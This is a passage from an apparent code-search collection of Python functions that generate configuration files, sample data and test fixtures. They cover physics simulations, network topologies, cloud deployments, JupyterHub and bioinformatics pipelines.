conditions.ram_disk + \"/\" + conditions.flux_base + \"\\n\"\n\n#flux_file = flux_file\n#\"\"\"\n\n# configContents += \"flux_file_path = \" + conditions.ram_disk + \"/\" + conditions.flux_base\n\n# configContents += \"\"\" \n#flux_file_start = 1\n#flux_file_stop = 300\n#\"\"\"\n\n configContents += \"maxint_file = \" + conditions.maxint_file_local + \"\\n\"\n\n# default: 5e17 but for basket MC special production higher\n configContents += \"\"\" \npot = 5.0e17\nneutrino_type = beam\n\"\"\"\n if conditions.baskmagn == \"basket\":\n configContents += \"\"\" \nflux_region = basket\nmaster_volume = Basket \nrandom_start = 1\n\"\"\"\n elif conditions.baskmagn == \"magnet\":\n configContents += \"\"\" \nflux_region = magnet\nmaster_volume = Magnet \nrandom_start 
= 1\n\"\"\"\n else:\n print \"Unknown basket/magnet condition\"\n \n\n configContents += \"random_seed = \" + str(getRandom()) +\"\\n\"\n configContents += \"neut_seed1 = \" + str(getRandom())+\"\\n\" \n configContents += \"neut_seed2 = \" + str(getRandom())+\"\\n\" \n configContents += \"neut_seed3 = \" + str(getRandom())+\"\\n\" \n\n configContents += \"\\n\"\n configContents += \"[nd280mc]\\n\"\n configContents += \"mc_type=Neut_RooTracker \\n\"\n\n #print configContents\n\n try:\n macFile = open(configname,\"w\")\n macFile.write(configContents)\n \n except:\n print \"can't write config file\" \n \n\n return configname", "def genConfig():\n\n cfg = open('/home/sevudan/Scripts/projects/topogen/result.cfg','w')\n template = getTemplate()\n G = topo.topology()\n gen_config_lo(G, cfg)\n # Get node from list nodes.\n for node in sorted(G.nodes):\n d = dict(G[node])\n hostname = node\n # Get attributes for node.\n peer = d.keys()\n for peer_node in peer:\n params = d.get(peer_node)\n conf = template.render(\n node=hostname,\n description = peer_node,\n ifd = params.get('ifd'),\n local_ifl = params.get('local_ifl'),\n peer_ifl = params.get('peer_ifl'),\n ifa = params.get('ip_address')\n )\n result = '{}{}'.format(conf,'\\n')\n cfg.write(result)\n cfg.close()", "def config():\n experiment_dir = './experiments'\n simulation_steps = 1000\n device = 'cpu'\n path_to_molecules = os.path.join(experiment_dir, 'data/ethanol.xyz')\n simulation_dir = os.path.join(experiment_dir, 'simulation')\n training_dir = os.path.join(experiment_dir, 'training')\n model_path = os.path.join(training_dir, 'best_model')\n overwrite = True", "def GenerateConfig(context):\n\n resources = [{\n 'name': context.env['name'],\n 'type': 'compute.v1.instance',\n 'properties': {\n 'zone': context.properties['zone'],\n 'machineType': ''.join([COMPUTE_URL_BASE, 'projects/',\n context.env['project'], '/zones/',\n context.properties['zone'], '/machineTypes/',\n context.properties['machineType']]),\n 'disks': [{\n 'deviceName': 'boot',\n 'type': 'PERSISTENT',\n 'boot': True,\n 'autoDelete': True,\n 'initializeParams': {\n 'sourceImage': ''.join([COMPUTE_URL_BASE, 'projects/',\n 'ubuntu-os-cloud/global/',\n 'images/family/ubuntu-1604-lts'])\n }\n }],\n 'networkInterfaces': [{\n 'network': '$(ref.' 
+ context.properties['network']\n + '.selfLink)',\n 'accessConfigs': [{\n 'name': 'External NAT',\n 'type': 'ONE_TO_ONE_NAT'\n }]\n }],\n 'metadata': {\n 'items': [{\n 'key': 'startup-script',\n 'value': ''.join(['#!/bin/bash\\n',\n 'sudo apt-get install openjdk-9-jre-headless -y\\n',\n 'sudo python -m SimpleHTTPServer 80'])\n }]\n }\n }\n }]\n return {'resources': resources}", "def bos_fixture():\n block_config = {\n \"Clock\": {\"start_time\": 0,\n \"end_time\": 10,\n \"num_steps\": 100},\n \"PhysicsModules\": {\n \"BlockOnSpring\": {\n \"mass\": 1,\n \"spring_constant\": 1,\n \"pusher\": \"Leapfrog\",\n \"x0\": [0, 1, 0],\n }\n },\n \"Tools\": {\n \"Leapfrog\": {},\n \"ForwardEuler\": {},\n \"BackwardEuler\": {}\n },\n \"Diagnostics\": {\n # default values come first\n \"directory\": \"test_output/\",\n \"output_type\": \"csv\",\n \"clock\": {\"filename\": \"time.csv\"},\n \"BlockDiagnostic\": [\n {'component': 'momentum', 'filename': 'block_p.csv'},\n {'component': 'position', 'filename': 'block_x.csv'}\n ]\n }\n }\n\n return block_config", "def testgen(self):\n self.parse()\n self.generate()", "def generate(self, no_samples):\n raise NotImplementedError(\"Implement this method.\")", "def test_happy_generate_config(self):\n yaml_input = yaml.load(MOCK_YAML)\n yaml_with_dot_notation = common.dotdict(yaml_input)\n generate_config_return = subnets_template.generate_config(yaml_with_dot_notation)\n self.assertEquals(generate_config_return, EXPECTED_OUTPUT)", "def generateDefaultConfig(self):\n\n\t\t# Open config.ini in write mode\n\t\tf = open(self.fileName, \"w\")\n\n\t\t# Set keys to config object\n\t\tself.config.add_section(\"db\")\n\t\tself.config.set(\"db\", \"host\", \"localhost\")\n\t\tself.config.set(\"db\", \"username\", \"root\")\n\t\tself.config.set(\"db\", \"password\", \"\")\n\t\tself.config.set(\"db\", \"database\", \"ripple\")\n\t\tself.config.set(\"db\", \"pingtime\", \"600\")\n\n\t\tself.config.add_section(\"server\")\n\t\tself.config.set(\"server\", \"server\", \"tornado\")\n\t\tself.config.set(\"server\", \"host\", \"0.0.0.0\")\n\t\tself.config.set(\"server\", \"port\", \"5001\")\n\t\tself.config.set(\"server\", \"localizeusers\", \"1\")\n\t\tself.config.set(\"server\", \"outputpackets\", \"0\")\n\t\tself.config.set(\"server\", \"outputrequesttime\", \"0\")\n\t\tself.config.set(\"server\", \"timeoutlooptime\", \"100\")\n\t\tself.config.set(\"server\", \"timeouttime\", \"100\")\n\n\t\tself.config.add_section(\"flask\")\n\t\tself.config.set(\"flask\", \"threaded\", \"1\")\n\t\tself.config.set(\"flask\", \"debug\", \"0\")\n\t\tself.config.set(\"flask\", \"logger\", \"0\")\n\n\t\tself.config.add_section(\"ci\")\n\t\tself.config.set(\"ci\", \"key\", \"changeme\")\n\n\t\t# Write ini to file and close\n\t\tself.config.write(f)\n\t\tf.close()", "def test_case_3(self):\n config_generator = Genesis()\n\n data = open_json_file('r1.json')\n\n task_1 = Task.new(data=data, name=\"R1_BASE_CONFIG\")\n task_2 = Task.new(data=data, name=\"R1_BASE_CONFIG_2\")\n\n config_generator.add_task(task_1)\n config_generator.add_task(task_2)\n\n results = config_generator.generate()\n self.assertIsInstance(results, dict)\n\n for task in config_generator.tasks:\n self.assertTrue(task.is_complete)\n self.assertIsInstance(task.rendered_data, str)", "def get_random_sweeps(self, k):\n\t\tfor _ in range(k):\n\t\t\tmodel_config = copy.copy(self._model_config.to_dict())\n\t\t\tsampled_config = self._sample_hyperparameters()\n\t\t\tfor k, v in sampled_config.items():\n\t\t\t\tmodel_config[k] = 
v\n\n\t\t\tmodel_config_md_wrapper = ModelConfigMetadataWrapper(sampled_config=sampled_config,\n\t\t\t\tmetrics_dir=self._metrics_dir, **model_config)\n\t\t\tself._generated_configs.append(model_config_md_wrapper)\n\t\t\tyield model_config_md_wrapper", "def create_samples(self):\n self._samples = self.load_samples()\n self.modify_samples()", "def create_config(self, context, mgmtport):\n pass", "def config_skeleton():\n config = Config()\n config.set_to_default()\n config.save()", "def main():\n\targs = getArgs()\n\tid_question = args.id_question\n\tlang = args.language\n\tdir_cp = None\n\twith open('config.json') as json_file:\n\t\tconfig_data = json.load(json_file)\n\t\tdir_cp = config_data['dir_cp']\n\n\t\n\t\n\t# sample_io = GetData(args.id_question).get_uri_io_sample()\n\ttemplate = FileUtil(id_question, dir_cp['path'], lang)\n\ttemplate.write_template()\n\t# print(sample_io)", "def createConfig():\n\twith open(configPath, 'w', encoding='utf-8') as file:\n\t\tjson.dump(default_config, file, indent=3)", "def test_config_spec(self):\n spec = self._gen.config_spec()\n self.assertIn('Number of examples', spec)\n self.assertIn('Maximum number of columns to change', spec)\n self.assertIn('Regression threshold', spec)\n self.assertIn('Prediction key', spec)", "def config():", "def config():", "def _create_sample(self, policy_output, next_state, reward, done, info,\n env_id):\n return {\n \"policy_output\": policy_output,\n \"next_state\": next_state,\n \"reward\": reward,\n \"done\": done,\n \"info\": info,\n \"env_id\": env_id\n }", "def testRunConfiguration(self):\n loader = Loader()\n loader.loadFromDirectory(self.__exampleDirectory)\n\n self.assertEqual(len(loader.taskHolders()), 1)\n\n taskHolder = loader.taskHolders()[0]\n\n taskHolder.addVar(\n \"prefix\",\n self.__exampleTargetPrefixDirectory,\n True\n )\n\n # loading input data for the execution\n crawlerGroups = Crawler.group(\n FsCrawler.createFromPath(\n os.path.join(self.__exampleDirectory, 'textures')\n ).globFromParent()\n )\n\n resultCrawlers = []\n for group in crawlerGroups:\n if isinstance(group[0], Crawler.registeredType('texture')):\n resultCrawlers += taskHolder.run(group)\n\n targetFilePaths = list(sorted(filter(lambda x: len(x), map(lambda x: x.strip(), self.__generatedData.split('\\n')))))\n createdFilePaths = list(sorted(map(lambda x: x.var('fullPath')[len(self.__exampleTargetPrefixDirectory) + 1:].replace('\\\\', '/'), resultCrawlers)))\n\n self.assertListEqual(targetFilePaths, createdFilePaths)", "def run(self):\n write_config(self.filename)\n print('Wrote default config to', self.filename)", "def _generate_global_config() -> str:\n logger = getLogger(__name__)\n dst = os.path.join(os.path.expanduser(\"~\"),\n \".aiscalator/config/aiscalator.conf\")\n logger.info(\"Generating a new configuration file for aiscalator:\\n\\t%s\",\n dst)\n pattern = [\n \"testUserID\",\n \"generation_date\",\n ]\n replace_value = [\n generate_user_id(),\n '\"' + str(datetime\n .utcnow()\n .replace(tzinfo=timezone(\"UTC\"))) +\n '\" // in UTC timezone',\n ]\n dst_dir = os.path.dirname(dst)\n if dst_dir:\n os.makedirs(dst_dir, exist_ok=True)\n copy_replace(data_file(\"../config/template/aiscalator.conf\"),\n dst, pattern=pattern, replace_value=replace_value)\n open(os.path.join(dst_dir, \"apt_packages.txt\"), 'a').close()\n open(os.path.join(dst_dir, \"requirements.txt\"), 'a').close()\n open(os.path.join(dst_dir, \"lab_extensions.txt\"), 'a').close()\n return dst", "def get_test_generator(cf, logger):\n # set up as method to read 
source data over the whole space (except annotated tiles)\n # and produce generated tiles\n config_file = os.environ[CONFIG_ENV_VAR]\n config = load_config(config_file)\n\n generate_full_output = GENERATE_FULL in os.environ\n\n if generate_full_output:\n # specify all covered tiles\n logger.info(\"Producing output for full data\")\n num_subdirs = len(config[\"subdir_paths\"])\n batch_data = []\n if GENERATE_SUBDIR in os.environ:\n generate_subdirs = [int(os.environ[GENERATE_SUBDIR])]\n else:\n generate_subdirs = range(num_subdirs)\n for subdir_num in generate_subdirs:\n annot_map, _, _ = get_annot_map(config, subdir_num)\n logger.info(\n \"Subdir %d, %d covered tiles\" % (subdir_num, annot_map.sum())\n )\n valid_tiles = np.stack(np.where(annot_map > 0), axis=1)\n batch_data.extend([(subdir_num, t) for t in valid_tiles])\n\n else:\n # choose tiles to output. if preferred tiles are specified, try using each\n # preferred tiles if it is not yet defined, and choose random subdir/tiles for\n # remaining\n # first define maps for each subdir\n subdir_maps = {}\n for subdir_num in range(len(config[\"subdir_paths\"])):\n # generate tiles from unannotated regions\n annot_map, annot_header, annotation_scale = get_annot_map(\n config, subdir_num\n )\n\n completed_map = get_completed_map(\n config, subdir_num, annot_map.shape\n )\n in_progress_map = get_completed_map(\n config, subdir_num, annot_map.shape, find_in_progress=True\n )\n incomplete_map = annot_map - completed_map - in_progress_map\n subdir_maps[subdir_num] = (\n annot_map,\n completed_map,\n in_progress_map,\n incomplete_map,\n )\n\n # check each preferred tile in turn\n chosen_tiles_list = []\n num_generate = config[\"generate_number_tiles\"]\n specified_subdir_num = None\n if GENERATE_SUBDIR in os.environ:\n specified_subdir_num = int(os.environ[GENERATE_SUBDIR])\n\n for index_vals in get_tiles_of_interest(config):\n subdir_num = index_vals[0]\n if (\n specified_subdir_num is not None\n and subdir_num != specified_subdir_num\n ):\n # only choose preferred tiles with given subdir number if specified\n continue\n index_number = np.array(index_vals[1:])\n annot_map, completed_map, in_progress_map, _ = subdir_maps[\n subdir_num\n ]\n try:\n check_index(index_number, completed_map, annot_map)\n check_index(index_number, in_progress_map, annot_map)\n except RuntimeError as e:\n # piece is already annotated/in-progress, or invalid\n logger.info(\n \"Skipping preferred tile %s, reason %s\" % (index_vals, e)\n )\n continue\n # piece is valid\n chosen_tiles_list.append(index_vals)\n if len(chosen_tiles_list) == num_generate:\n break\n\n logger.info(\"Using preferred tiles: %s\" % (chosen_tiles_list,))\n\n # choose a number of random tiles for remaining\n for _ in range(num_generate - len(chosen_tiles_list)):\n if specified_subdir_num is None:\n # choose a random subdir\n subdir_num = np.random.randint(len(config[\"subdir_paths\"]))\n else:\n subdir_num = specified_subdir_num\n (\n annot_map,\n completed_map,\n in_progress_map,\n incomplete_map,\n ) = subdir_maps[subdir_num]\n\n logger.info(\n \"Choosing random tile from subdir %d, %d incomplete tiles out of %d\"\n % (subdir_num, incomplete_map.sum(), annot_map.sum())\n )\n\n # choose tile to cover\n incomplete_tiles = np.stack(np.where(incomplete_map > 0), axis=1)\n chosen_set_index = np.random.randint(incomplete_tiles.shape[0])\n chosen_tile_index = incomplete_tiles[chosen_set_index] # (3,)\n chosen_tiles_list.append([subdir_num] + chosen_tile_index.tolist())\n\n logger.info(\"Chosen tiles: %s\" 
% (chosen_tiles_list,))\n\n # todo: find sections for incomplete tiles? need to find how this is done with the automated\n # overlapping tile selection\n\n # # for now just choose an origin section from each tile\n # test_sections = [x * annotation_scale for x in chosen_tiles]\n # logger.info(\"Using %d incomplete sections\" % (len(test_sections),))\n\n # create data as a list of tuples, each with the subdir number and tile index\n batch_data = [(x[0], x[1:]) for x in chosen_tiles_list]\n\n batch_gen = {}\n batch_iterator = PatientBatchIterator(\n batch_data, cf, config, generate_full_output\n )\n batch_gen[\"test\"] = batch_iterator\n # batch_gen[\"test\"] = create_data_gen_pipeline(\n # test_sections,\n # cf=cf,\n # annotation_config=config,\n # is_training=False,\n # segments_defined=False,\n # )\n\n # find how many patches per instance\n # patch_size = batch_iterator.patch_size\n # patch_crop_coords_list = dutils.get_patch_crop_coords(\n # np.zeros(config[\"annotation_size\"]), patch_size, min_overlap=np.array(patch_size).min()\n # )\n\n # print(\"num patches %d\" % len(patch_crop_coords_list))\n # batch_gen[\"n_test\"] = len(patch_crop_coords_list) # test_sections)\n # batch_gen[\"n_test\"] = len(chosen_tiles)\n batch_gen[\"n_test\"] = min(len(batch_data), config[\"generate_number_tiles\"])\n\n # set up for full export if parameter defined in environ\n if generate_full_output:\n batch_gen[\"exporter\"] = BatchExporter(cf, config)\n batch_gen[\"repeat_test_output\"] = True\n return batch_gen", "def generate_arguments(config_filename):\n\n with open(config_filename, \"r\") as f:\n config = json.load(f)\n\n rng_state = np.random.get_state()\n np.random.seed(config[\"seed\"])\n\n # Maximum total number of sources\n n_sources = np.max(config[\"n_channels_list\"])\n\n # First we randomly select all the speech samples\n gen_files_seed = int(np.random.randint(2 ** 32, dtype=np.uint32))\n all_wav_files = sampling(\n config[\"n_repeat\"],\n n_sources,\n config[\"samples_list\"],\n gender_balanced=True,\n seed=gen_files_seed,\n )\n\n # now get the transcripts\n with open(config[\"samples_list\"]) as f:\n dataset_metadata = json.load(f)\n\n all_transcripts = []\n for subset in all_wav_files:\n transcripts = []\n for fn in subset:\n transcripts.append(dataset_metadata[\"transcripts\"][Path(fn).name])\n all_transcripts.append(transcripts)\n\n # Pick the seeds to reproducibly build a bunch of random rooms\n room_seeds = np.random.randint(\n 2 ** 32, size=config[\"n_repeat\"], dtype=np.uint32\n ).tolist()\n\n args = []\n for n_channels in config[\"n_channels_list\"]:\n for room_id, (wav_files, transcripts, room_seed) in enumerate(\n zip(all_wav_files, all_transcripts, room_seeds)\n ):\n\n # add the new combination to the list\n args.append(\n [\n n_channels,\n room_id,\n room_seed,\n wav_files[:n_channels],\n transcripts[:n_channels],\n config_filename,\n ]\n )\n\n np.random.set_state(rng_state)\n\n return args", "def test_config():\n assert not sample.create_app().testing\n assert sample.create_app({\"TESTING\": True}).testing", "def generator_params_fixture(\n tmpdir_factory, json_frame_specification_fixture, random_seed_fixture\n):\n\n params = dict()\n params[\"pre_post_omission\"] = 0\n params[\"total_samples\"] = -1\n params[\"name\"] = \"MovieJSONGenerator\"\n params[\"start_frame\"] = 0\n params[\"end_frame\"] = -1\n params[\"pre_frame\"] = 2\n params[\"post_frame\"] = 2\n params[\"randomize\"] = True\n params[\"data_path\"] = json_frame_specification_fixture[\"json_path\"]\n 
params[\"steps_per_epoch\"] = -1\n params[\"train_path\"] = json_frame_specification_fixture[\"json_path\"]\n params[\"type\"] = \"generator\"\n params[\"seed\"] = random_seed_fixture\n return params", "def setUpConfig(self):\n pass", "def make_config(outfile, sample_rate, numof_channels, mode, server = 'localhost', shape = 'None',\n security_mode = False, saving_mode = False, data_file = 'Nofile', format = 'binary',\n resolution = 0.1, returning_speed = 8, channels = 0,\n color_bg = 'white', color_trigger = 'black',\n size_window = (1000, 800)):\n\n\n config = ConfigParser.RawConfigParser()\n\n config.add_section('technics')\n config.add_section('visualization')\n config.add_section('security')\n config.add_section('data')\n\n config.set('technics', 'sample_rate', sample_rate)\n config.set('technics', 'numof_channels', numof_channels)\n config.set('technics', 'server', server)\n config.set('technics', 'resolution', resolution)\n config.set('technics', 'speed', returning_speed)\n if channels == 0:\n channels = range(numof_channels+1)[1:numof_channels+1]\n config.set('technics', 'channels', channels)\n\n config.set('visualization', 'mode', mode)\n config.set('visualization', 'color_bg', color_bg)\n config.set('visualization', 'color_trigger', color_trigger)\n config.set('visualization', 'size_window', size_window)\n\n config.set('security', 'security_mode', security_mode)\n\n config.set('data', 'saving_mode', saving_mode)\n config.set('data', 'file', data_file)\n config.set('data', 'format', format)\n\n config_file = open(outfile, 'w+')\n\n config.write(config_file)", "def get_generated_config(self, auth_provider: KeyProvider, secret_key):\n\n generated_config = {\n 'jupyterhub': {\n 'proxy': {\n 'https': {\n 'hosts': [self.spec['domain']]\n }\n },\n 'ingress': {\n 'hosts': [self.spec['domain']],\n 'tls': [\n {\n 'secretName': 'https-auto-tls',\n 'hosts': [self.spec['domain']]\n }\n ]\n\n },\n 'singleuser': {\n # If image_repo isn't set, just have an empty image dict\n 'image': {'name': self.cluster.spec['image_repo']} if 'image_repo' in self.cluster.spec else {},\n },\n 'hub': {\n 'config': {},\n 'initContainers': [\n {\n 'name': 'templates-clone',\n 'image': 'alpine/git',\n 'args': [\n 'clone',\n '--',\n 'https://github.com/2i2c-org/pilot-homepage',\n '/srv/repo',\n ],\n 'securityContext': {\n 'runAsUser': 1000,\n 'allowPrivilegeEscalation': False,\n 'readOnlyRootFilesystem': True,\n },\n 'volumeMounts': [\n {\n 'name': 'custom-templates',\n 'mountPath': '/srv/repo'\n }\n ]\n }\n ],\n 'extraContainers': [\n {\n 'name': 'templates-sync',\n 'image': 'alpine/git',\n 'workingDir': '/srv/repo',\n 'command': ['/bin/sh'],\n 'args': [\n '-c',\n dedent(\n f'''\\\n while true; do git fetch origin;\n if [[ $(git ls-remote --heads origin {self.spec[\"name\"]} | wc -c) -ne 0 ]]; then\n git reset --hard origin/{self.spec[\"name\"]};\n else\n git reset --hard origin/master;\n fi\n sleep 5m; done\n '''\n )\n ],\n 'securityContext': {\n 'runAsUser': 1000,\n 'allowPrivilegeEscalation': False,\n 'readOnlyRootFilesystem': True,\n },\n 'volumeMounts': [\n {\n 'name': 'custom-templates',\n 'mountPath': '/srv/repo'\n }\n ]\n }\n ],\n 'extraVolumes': [\n {\n 'name': 'custom-templates',\n 'emptyDir': {}\n }\n ],\n 'extraVolumeMounts':[\n {\n 'mountPath': '/usr/local/share/jupyterhub/custom_templates',\n 'name': 'custom-templates',\n 'subPath': 'templates'\n },\n {\n 'mountPath': '/usr/local/share/jupyterhub/static/extra-assets',\n 'name': 'custom-templates',\n 'subPath': 'extra-assets'\n }\n ]\n }\n },\n }\n #\n 
# Allow explicilty ignoring auth0 setup\n if self.spec['auth0'].get('enabled', True):\n # Auth0 sends users back to this URL after they authenticate\n callback_url = f\"https://{self.spec['domain']}/hub/oauth_callback\"\n # Users are redirected to this URL after they log out\n logout_url = f\"https://{self.spec['domain']}\"\n client = auth_provider.ensure_client(\n name=self.spec['auth0'].get('application_name', f\"{self.cluster.spec['name']}-{self.spec['name']}\"),\n callback_url=callback_url,\n logout_url=logout_url,\n connection_name=self.spec['auth0']['connection'],\n connection_config=self.spec['auth0'].get(self.spec['auth0']['connection'], {}),\n )\n # FIXME: We're hardcoding Auth0OAuthenticator here\n # We should *not*. We need dictionary merging in code, so\n # these can all exist fine.\n generated_config['jupyterhub']['hub']['config']['Auth0OAuthenticator'] = auth_provider.get_client_creds(client, self.spec['auth0']['connection'])\n\n return self.apply_hub_template_fixes(generated_config, secret_key)", "def _prepare_samples(args):\n if args.galaxy:\n system_config = args.galaxy\n else:\n system_config = os.path.join(_get_data_dir(), \"galaxy\", \"bcbio_system.yaml\")\n config = yaml.load(open(system_config))\n config['algorithm'] = {}\n data = []\n vcf_files = [fn for fn in args.files if fn.endswith('vcf')]\n bam_files = [fn for fn in args.files if fn.endswith('bam')]\n fastq_files = [fn for fn in args.files if is_fastq(fn)]\n if not fastq_files:\n fastq_files = vcf_files\n for sample in fastq_files:\n dt = {}\n dt['name'] = splitext_plus(op.basename(sample))[0]\n dt['config'] = config\n dt['fastq'] = op.abspath(sample)\n if bam_files:\n dt['bam'] = _find_bam(bam_files, sample)\n data.append([dt])\n return data", "def configuration(config):\n create_str_dir(config)\n add_skymap(config)\n save_configuration(config)", "def _configure(self):\n test_lib.test_config.setdefault('config_files', []).append(\n self.filename)\n self._write_config_content()", "def mock_config():\n from .. 
import config\n\n _old_fs = os.getenv('FREESURFER_HOME')\n if not _old_fs:\n os.environ['FREESURFER_HOME'] = mkdtemp()\n\n filename = Path(pkgrf('fmriprep', 'data/tests/config.toml'))\n settings = loads(filename.read_text())\n for sectionname, configs in settings.items():\n if sectionname != 'environment':\n section = getattr(config, sectionname)\n section.load(configs, init=False)\n config.nipype.omp_nthreads = 1\n config.nipype.init()\n config.loggers.init()\n config.init_spaces()\n\n config.execution.work_dir = Path(mkdtemp())\n config.execution.bids_dir = Path(pkgrf('fmriprep', 'data/tests/ds000005')).absolute()\n config.execution.fmriprep_dir = Path(mkdtemp())\n config.execution.init()\n\n yield\n\n shutil.rmtree(config.execution.work_dir)\n shutil.rmtree(config.execution.fmriprep_dir)\n\n if not _old_fs:\n del os.environ[\"FREESURFER_HOME\"]", "def module_config_template():\n\n d = {\"AWSPricePerformancePublisher\": {\n \"module\": \"modules.AWS.publishers.AWS_price_performance\",\n \"name\": \"AWSPricePerformancePublisher\",\n }, }\n print(\"Entry in channel cofiguration\")\n pprint.pprint(d)\n print(\"where\")\n print(\"\\t name - name of the class to be instantiated by task manager\")\n print(\"\\t publish_to_graphite - publish to graphite if True\")\n print(\"\\t graphite_host - graphite host name\")", "def example_generator(self, mode: str):\n raise NotImplementedError", "def urban_configurations_test():\n gaz = VladGazetteer(TextIOWrapper(resource_stream('pycaptioner', 'test/data/gazetteer_urban.txt')))\n reader = DictReader(TextIOWrapper(resource_stream('pycaptioner', 'test/data/points.csv')))\n for line in reader:\n if line['category'] == 'urban':\n point = geometry.Point(float(line['lon']), float(line['lat']))\n configurations = generate_configurations(point, gaz, 'urban')\n configurations['subject'] = {'dc_title': line['subject']}\n caption = urban_caption(configurations)\n tools.assert_is_not_none(caption)\n caption = generate_caption(caption)\n tools.assert_is_not_none(caption)\n print(caption)\n tools.assert_is_not_none(None)", "def build_config():\n if not os.path.exists(config_path):\n # generate key pair\n priv_key, pub_key = crypt.ecdsa_generate()\n if not priv_key or not pub_key:\n log.error(\"Unable to generate public/private keypair....\")\n exit(0)\n else:\n # fill default config with generated keypair\n base_config['key']['pub'] = pub_key\n base_config['key']['priv'] = priv_key\n\n # dump default config\n log.info(\"Dumping initial config to: %s\", config_path)\n with open(config_path, 'w') as fp:\n json.dump(base_config, fp, sort_keys=True, indent=2)\n return True\n else:\n return False", "def app():\n\n def _app(config_class):\n _app = create_app(config_class)\n seed_collection_with_csv(_app.config['DATA_FILENAME'])\n _app.app_context().push()\n return _app\n\n yield _app('config.TestingConfig')", "def get_configuration_template(self):\n return {'EXAMPLE_KEY_1': \"Example value\",\n 'EXAMPLE_KEY_2': [\"Example\", \"Value\"]\n }", "def main():\n load()\n\n print(generate())", "def trial_config(self, prev_config, cov_config=1e-2):\r\n return prev_config + np.random.normal(0, cov_config, len(prev_config))", "def get_configuration_template(self):\n return {'EXAMPLE_KEY_1': \"Example value\",\n 'EXAMPLE_KEY_2': [\"Example\", \"Value\"]\n }", "def config(self, **kw):\n self.cfg_fixture.config(**kw)", "def generate(self):\n pass", "def generate(self):\n pass", "def generate(self):\n pass", "def dep_sample_generator(path_to_file):\n assert 
os.path.isfile(path_to_file), \"File does not exist\"\n root = DepSample(0, ROOT, ROOT, 0)\n with open(path_to_file) as fp:\n sample = [root]\n for line in fp:\n if not line.rstrip():\n yield sample\n sample = [root]\n else:\n ls = line.rstrip().split('\\t')\n # print(ls)\n sample.append(DepSample(int(ls[0]), ls[1], ls[3], int(ls[6])))\n if len(sample) > 1:\n yield sample", "def generate(self):\n logger.info(\"Starting yml generation..\")\n if not self.is_generatable_file:\n logger.error(\n f\"[red]Not running file {self.filename} without metadata collector.[/red]\"\n )\n return\n # Collect the wrapped functions with the details.\n self.collect_functions()\n # Make sure when they are ran, only collecting data will be performed.\n if self.metadata_collector:\n self.metadata_collector.set_collect_data(True)\n # Run the functions and by that, collect the data.\n self.run_functions()\n # Write the yml file according to the collected details.\n self.extract_metadata()\n # Make sure the functions are back to normal running state.\n if self.metadata_collector:\n self.metadata_collector.set_collect_data(False)\n # Remove imports from file\n self.remove_collector_imports()", "def _generate_samples(samples_data_table=None):\n samples_data_table = samples_data_table or dict()\n\n con_name = f\"Auto_Sample_Test_{datetime.now()}\"\n con_result_soup = BeautifulSoup(_post_con(con_name), \"xml\")\n con_uri = con_result_soup.find(\"con:container\")[\"uri\"]\n\n sample_list = list()\n for i in range(1, 97, 2):\n well = (\n 'ABCDEFGH'[(i - 1) % 8] + ':' + '%01d' % ((i - 1) // 8 + 1,))\n letter = 'ABCDEFGH'[i % 8]\n to_add = api_types.Sample(f\"test{i}{letter}\")\n to_add.location = well\n to_add.con = api_types.Container(\n con_name,\n \"96 well plate\",\n \"\",\n con_uri)\n\n for data_name, data_value in samples_data_table.items():\n if \"udf\" in data_name:\n udf_name = data_name.strip(\"udf_\")\n to_add.udf_to_value[udf_name] = data_value\n elif \"adapter\" in data_name:\n to_add.adapter = data_value\n sample_list.append(to_add)\n return sample_list", "def generate(self):\n pass", "def get_sample(config, n_sample=1):\n if config['distribution'] == 'binary':\n data = np.random.choice([0, 1], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'discrete':\n data = np.random.choice(config['category'], size=n_sample, replace=True, p=config['pmf'])\n\n elif config['distribution'] == 'uniform':\n assert float(config['min']) < float(config['max'])\n data=np.random.uniform(low=float(config['min']),high=float(config['max']),size=n_sample)\n\n elif config['distribution'] == 'gaussian':\n data=np.random.normal(loc=float(config['mean']),scale=float(config['std']),size=n_sample)\n data = np.maximum(data, float(config['min']))\n data = np.minimum(data, float(config['max']))\n\n elif config['distribution'] == 'uniform_int':\n if int(config['min'])==int(config['max']):\n data=int(config['min'])*np.ones((n_sample,),dtype='int32')\n else:\n data=np.random.randint(int(config['min']),high=int(config['max']),size=n_sample)\n\n else:\n log.warning('Warning: unknown distribution type: %s' % config['distribution'])\n data = []\n\n return data", "def generate(ctx, include, host_data_type, encryption_type, match_rate, sparsity, guest_data_size,\n host_data_size, guest_feature_num, host_feature_num, output_path, force, split_host, upload_data,\n remove_data, use_local_data, parallelize, **kwargs):\n ctx.obj.update(**kwargs)\n ctx.obj.post_process()\n namespace = ctx.obj[\"namespace\"]\n config_inst = 
ctx.obj[\"config\"]\n if ctx.obj[\"extend_sid\"] is not None:\n config_inst.extend_sid = ctx.obj[\"extend_sid\"]\n if ctx.obj[\"auto_increasing_sid\"] is not None:\n config_inst.auto_increasing_sid = ctx.obj[\"auto_increasing_sid\"]\n if parallelize and upload_data:\n upload_data = False\n yes = ctx.obj[\"yes\"]\n echo.welcome()\n echo.echo(f\"testsuite namespace: {namespace}\", fg='red')\n echo.echo(\"loading testsuites:\")\n if host_data_size is None:\n host_data_size = guest_data_size\n suites = _load_testsuites(includes=include, excludes=tuple(), glob=None)\n suites += _load_testsuites(includes=include, excludes=tuple(), glob=None,\n suffix=\"benchmark.json\", suite_type=\"benchmark\")\n for suite in suites:\n if upload_data:\n echo.echo(f\"\\tdataget({len(suite.dataset)}) dataset({len(suite.dataset)}) {suite.path}\")\n else:\n echo.echo(f\"\\tdataget({len(suite.dataset)}) {suite.path}\")\n if not yes and not click.confirm(\"running?\"):\n return\n\n _big_data_task(include, guest_data_size, host_data_size, guest_feature_num, host_feature_num, host_data_type,\n config_inst, encryption_type, match_rate, sparsity, force, split_host, output_path, parallelize)\n if upload_data:\n if use_local_data:\n _config.use_local_data = 0\n _config.data_switch = remove_data\n client_upload(suites=suites, config_inst=config_inst, namespace=namespace, output_path=output_path)", "def create_config(output_dir='my-hls-test', project_name='myproject', backend='Vivado', version='1.0.0', **kwargs):\n backend_list = hls4ml.backends.get_available_backends()\n if backend.lower() not in backend_list:\n raise Exception(f'Unknown backend: {backend}')\n\n backend = hls4ml.backends.get_backend(backend)\n\n backend_config = backend.create_initial_config(**kwargs)\n\n config = {}\n config['OutputDir'] = output_dir\n config['ProjectName'] = project_name\n config['Backend'] = backend.name\n config['Version'] = version\n config.update(backend_config)\n\n return config", "def generate_specs_build(self):\n from django_swagger_utils.drf_server.generators.swagger_generator import SwaggerGenerator\n\n swagger_gen = SwaggerGenerator(self.parser, self.paths, self.app_name)\n # generating 